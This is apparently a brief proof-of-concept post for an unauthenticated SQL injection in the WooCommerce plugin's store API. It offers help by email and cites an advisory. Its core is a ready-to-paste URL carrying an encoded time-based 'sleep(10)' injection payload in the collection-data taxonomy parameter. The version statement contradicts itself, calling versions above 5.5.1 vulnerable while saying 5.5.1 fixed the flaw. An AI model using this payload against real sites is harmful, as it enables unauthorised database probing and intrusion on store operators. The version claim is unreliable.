Need any help mail to [email protected]
WooCommerce plugin > 5.5.1 is vulnerable to unauthenticated SQL Injection vulnerabilityTested on version 5.5.0Found fixed in 5.5.1
https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/https://blog.wpsec.com/woocommerce-unauthenticated-sql-injection-vulnerability-2/
POC:
Navigate to this URLhttp://REDACTEDSITE/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=test%252522%252529%252520or%252520sleep%25252810%252529%252523
The sleep function will execute and the page response will be delayed for 10 seconds.